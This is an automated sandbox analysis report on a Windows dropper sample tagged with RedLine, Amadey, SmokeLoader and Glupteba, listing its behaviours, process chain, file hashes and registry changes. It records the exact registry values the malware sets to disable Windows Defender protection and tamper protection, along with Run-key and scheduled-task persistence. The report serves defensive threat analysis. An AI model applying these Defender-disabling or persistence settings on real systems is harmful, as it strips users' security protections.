Malware Analysis Report

2025-01-23 09:01

Sample ID 231010-yxgjwaah29
Target fd2fde4b51e79039d00b43f7cd00b31f.exe
SHA256 1055e85f63c4918500650bf56924ee225d9d62db0c778ea8f606f844e6d13bf9
Tags
evasion persistence trojan amadey dcrat glupteba healer redline smokeloader lutyr magia up3 backdoor discovery dropper infostealer loader rat spyware stealer
Score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

Score
10/10

SHA256

1055e85f63c4918500650bf56924ee225d9d62db0c778ea8f606f844e6d13bf9

Threat Level: Known bad

The file fd2fde4b51e79039d00b43f7cd00b31f.exe was found to be: Known bad.

Malicious Activity Summary

RedLine

Amadey

Detects Healer, an antivirus disabler dropper

Glupteba

DcRat

Suspicious use of NtCreateUserProcessOtherParentProcess

SmokeLoader

Healer

Glupteba payload

Modifies Windows Defender Real-time Protection settings

RedLine payload

Downloads MZ/PE file

Modifies Windows Firewall

Stops running service(s)

Drops file in Drivers directory

Loads dropped DLL

Checks computer location settings

Executes dropped EXE

Windows security modification

Reads user/profile data of web browsers

Checks installed software on the system

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Suspicious use of SetThreadContext

Launches sc.exe

Drops file in Program Files directory

Drops file in Windows directory

Checks for VirtualBox DLLs, possible anti-VM trick

Program crash

Enumerates physical storage devices

Unsigned PE

Creates scheduled task(s)

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious behavior: EnumeratesProcesses

Modifies registry class

Suspicious behavior: MapViewOfSection

Modifies data under HKEY_USERS

Suspicious use of FindShellTrayWindow

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Checks SCSI registry key(s)

Suspicious use of AdjustPrivilegeToken

Suspicious use of SendNotifyMessage

Enumerates system info in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-10 20:09

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-10 20:09

Reported

2023-10-10 20:13

Platform

win7-20230831-en

Max time kernel

161s

Max time network

139s

Command Line

"C:\Users\Admin\AppData\Local\Temp\fd2fde4b51e79039d00b43f7cd00b31f.exe"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe N/A

Windows security modification

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\fd2fde4b51e79039d00b43f7cd00b31f.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1924 set thread context of 2712 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1688 wrote to memory of 1584 N/A C:\Users\Admin\AppData\Local\Temp\fd2fde4b51e79039d00b43f7cd00b31f.exe C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe
PID 1584 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe
PID 3008 wrote to memory of 2692 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe
PID 2692 wrote to memory of 2560 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe
PID 2692 wrote to memory of 1924 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe
PID 1924 wrote to memory of 2712 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1924 wrote to memory of 2744 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe C:\Windows\SysWOW64\WerFault.exe
PID 2712 wrote to memory of 2784 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\SysWOW64\WerFault.exe

Processes

C:\Users\Admin\AppData\Local\Temp\fd2fde4b51e79039d00b43f7cd00b31f.exe

"C:\Users\Admin\AppData\Local\Temp\fd2fde4b51e79039d00b43f7cd00b31f.exe"

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe

C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe

C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe

C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1924 -s 284

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2712 -s 268

Network

N/A

Files

\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe

MD5 e3f20ad259a862d3cda234b5b25db716
SHA1 da45c1bc0344ee184f7f2f3d6b3a4b0d7cda2e0b
SHA256 4f82b4eaa9ef7dbc28d2c3a1c1b43bfeddfc478e7e8922b680df227b7cbef2af
SHA512 d562a680571d08811c42ed1905dc0524d728428ae9a80d465b6d53a57a6de5dd0522b53da39e3a769ee60faabecc941ce04c484515d604b6e3a4b298e8c9ff4c

\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe

MD5 cc353418f49a51a7bef2afef59ce5071
SHA1 8a48f140bcac612e7701d1fb4f32f24b040fb986
SHA256 e525e5cc3fff370219746ffdea9b7e95157646810707421dc557c940a20cffbd
SHA512 d67c43d9805ac0eff86fc423cd52089e500f633515aa6560cbb86a795737f875c1e4c8590bd97899a40c0f756333f16b651a1bd1da2aaa3053bc59aaf534e9b4

\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe

MD5 fbfba8262cb0687c1616c345893fd7e1
SHA1 18ec2d75f3eaacd497f05d21be556c0ecf760e4c
SHA256 853f57334d5ae888b689559ff4617207736181e8d057985fd02344f335e49f08
SHA512 f760a79089e3ed9162035ccf6e9cb70922fefac79b1418bf71395e943a73da955a0bdd52f2c1d68d2c9cc7bcdcecc8cec23e1a640f875b2d30b26ae3d0da906b

\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe

MD5 6241b03d68a610324ecda52f0f84e287
SHA1 da80280b6e3925e455925efd6c6e59a6118269c4
SHA256 ec74de9416b8ef2c3bdb1a9835e54548b3185524210d1aeffa91c98f74f751e2
SHA512 a60fe447cb0bed8e6cbd7c344b19a4602553209cbda7a40993f0fdf01e096bda4b79de0b528ecebf2efa0007f81d7bd6c7ef84252b2a160c93d642a78f0095f9

\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe

MD5 9f7da01ebd8a0ab0d1711de39405883d
SHA1 e92b5303fcae4341f66b365e9df00a191e82c59b
SHA256 9a39312d99741edf3f4a575151ee4d46731bb84baba1ed44fd2a00952d1f01d5
SHA512 62ce69db5827f6a88e9bede29431ab1ab4dc1418fbd4a22c6fdc778c9fc1b1223929964d5c65011f288ffb7271a80591f06e4c0c398ce3c98e163eac904e9200

Analysis: behavioral2

Detonation Overview

Submitted

2023-10-10 20:09

Reported

2023-10-10 20:12

Platform

win10v2004-20230915-en

Max time kernel

102s

Max time network

154s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

DcRat

rat infostealer dcrat
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\fd2fde4b51e79039d00b43f7cd00b31f.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Detects Healer, an antivirus disabler dropper

Description Indicator Process Target
N/A N/A N/A N/A

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A

Healer

dropper healer

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\CF0.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" C:\Users\Admin\AppData\Local\Temp\CF0.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" C:\Users\Admin\AppData\Local\Temp\CF0.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection C:\Users\Admin\AppData\Local\Temp\CF0.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" C:\Users\Admin\AppData\Local\Temp\CF0.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" C:\Users\Admin\AppData\Local\Temp\CF0.exe N/A

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A

SmokeLoader

trojan backdoor smokeloader

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File created C:\Windows\System32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A

Stops running service(s)

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\E87.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\564F.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5hl0oq6.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\8D7.bat N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Yy4755.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3Uw30ar.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Bh039GC.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5hl0oq6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\47F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oW6Zt8oj.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\iO8uY9pP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\674.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YL1xJ1lt.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\MR9kh3on.exe N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8D7.bat N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\C04.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\CF0.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\E87.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2Ow203LP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\564F.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\source1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86F5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\89E4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\8F25.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Program Files\Google\Chrome\updater.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\86F5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\86F5.exe N/A
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Reads user/profile data of web browsers

spyware stealer

Windows security modification

evasion trojan

Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\CF0.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1zg68IH7.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Adds Run key to start application

persistence

Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\fd2fde4b51e79039d00b43f7cd00b31f.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\HG5ka69.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\47F.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\iO8uY9pP.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP004.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\YL1xJ1lt.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup4 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP005.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\MR9kh3on.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3027552071-446050021-1254071215-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\tE5gS63.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\sq6CQ71.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\oW6Zt8oj.exe N/A

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Google\Chrome\updater.exe C:\Users\Admin\AppData\Local\Temp\latestX.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\rss C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\toolspub2.exe N/A

Creates scheduled task(s)

persistence

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A
N/A N/A C:\Windows\SYSTEM32\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2492 = "Aus Central W. Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-2791 = "Novosibirsk Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-791 = "SA Western Daylight Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\C:\Windows\system32\,@tzres.dll,-1822 = "Russia TZ 1 Standard Time" C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
